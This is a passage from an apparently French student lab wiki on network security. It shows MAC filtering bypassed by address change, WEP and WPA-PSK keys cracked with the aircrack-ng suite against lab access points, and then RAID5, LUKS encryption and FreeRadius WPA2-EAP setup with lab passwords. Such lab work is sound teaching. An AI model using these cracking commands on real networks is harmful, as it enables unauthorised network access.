Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
                       36 40 94 7D B4 05 80 B2 60 FA 84 81 50 CE DC 87 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 83 03 24 AC 39 AB 67 E7 7B C4 40 E8 6B 6D 7D 47 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Réalisations ===&lt;br /&gt;
==== Sécurisation des données ====&lt;br /&gt;
&lt;br /&gt;
Nous créons d'abord 3 nouvelles partitions, que nous associons à notre VM en modifiant le fichier GreenArrow.cfg :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-1 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-2 -v&lt;br /&gt;
lvcreate -L 1G -n /dev/virtual/GreenArrow-3 -v&lt;br /&gt;
&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-1,xvdd,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-2,xvde,w',&lt;br /&gt;
'phy:/dev/virtual/GreenArrow-3,xvdf,w',&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite installer mdadm :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install mdadm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avions une erreur à propos du subsystem. Pour que cela fonctionne, il nous manquait la commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install linux-image-3.16.0-4-amd64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de la machine, nous créons le volume /dev/md0:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 0&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis nous sauvons cette dernière afin de conserver md0:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mkfs /dev/md0&lt;br /&gt;
root@GreenArrow:~# mkdir /datamd0&lt;br /&gt;
root@GreenArrow:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être surs que la partition soit encore montée après le reboot:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/md0 /datamd0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# vim testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous mettons en commentaire la 2ème partition dans le fichier de conf, puis redémarrons la machine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/datamd0# mdadm --detail /dev/md0&lt;br /&gt;
/dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Mon Nov 28 12:56:23 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
&lt;br /&gt;
    Update Time : Mon Nov 28 13:20:27 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
&lt;br /&gt;
           Name : GreenArrow:0  (local to host GreenArrow)&lt;br /&gt;
           UUID : f70ca72e:e8adc585:ec023dca:21061341&lt;br /&gt;
         Events : 4&lt;br /&gt;
&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       2       0        0        2      removed&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# ls /datamd0/&lt;br /&gt;
testraid5.txt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours:&lt;br /&gt;
Suppression de la partition xvdf:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --set-faulty /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --remove /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La partition est bien supprimée:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remet la partition:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# mdadm --add /dev/md0 /dev/xvdf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
On peut ensuite constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===&amp;gt;.................]  recovery = 18.2% (191112/1047552) finish=0.4min speed=31852K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 20.0% (210764/1047552) finish=0.4min speed=30109K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant un mauvais mot de passe, une erreur apparaît.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
Tout d'abord, nous installons FreeRadius sur notre machine virtuelle.&amp;lt;br /&amp;gt;&lt;br /&gt;
Dans le fichier '''users''', nous renseignons le login et le mot de passe pour se connecter à la borne Wifi : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
GreenArrow Cleartext-Password:=&amp;quot;glopglop&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Dans le fichier '''clients.conf''', nous ajoutons la configuration de la borne E306 et E304 :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
client E306 {&lt;br /&gt;
	ipaddr		= 10.60.1.2&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
client E304 {&lt;br /&gt;
	ipaddr		= 10.60.1.4&lt;br /&gt;
	secret		= password&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite, on passe à la configuration de la borne Wifi. On se connecte en telnet via '''telnet 10.60.1.2''', puis nous rentrons en mode configuration : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aaa authentication login eap_greenarrow group radius_greenarrow&lt;br /&gt;
radius-server host 193.48.57.162 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
aaa group server radius radius_greenarrow&lt;br /&gt;
server 193.48.57.162 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_GREENARROW&lt;br /&gt;
vlan 3&lt;br /&gt;
authentication open eap eap_greenarrow&lt;br /&gt;
authentication network-eap eap_greenarrow&lt;br /&gt;
authentication key-management wpa&lt;br /&gt;
mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption vlan 3 mode ciphers aes-ccm tkip&lt;br /&gt;
ssid SSID_GREENARROW&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
no ip route-cache&lt;br /&gt;
bridge-group 3&lt;br /&gt;
bridge-group 3 subscriber-loop-control&lt;br /&gt;
bridge-group 3 spanning-disabled&lt;br /&gt;
bridge-group 3 block-unknown-source&lt;br /&gt;
no bridge-group 3 source-learning&lt;br /&gt;
no bridge-group 3 unicast-flooding &lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.3&lt;br /&gt;
encapsulation dot1Q 3&lt;br /&gt;
bridge-group 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois ces modifications effectuées, nous configurons l'interface wlan0 de l'eeePC pour pouvoir se connecter au Wifi à l'aide de '''ifup wlan0''' : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
  address 10.60.6.2&lt;br /&gt;
  netmask 255.255.255.0&lt;br /&gt;
  gateway 10.60.3.1&lt;br /&gt;
  wpa-ssid SSID_GREENARROW&lt;br /&gt;
  wpa-key-mgmt WPA-EAP&lt;br /&gt;
  wpa-identity GreenArrow&lt;br /&gt;
  wpa-password glopglop&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
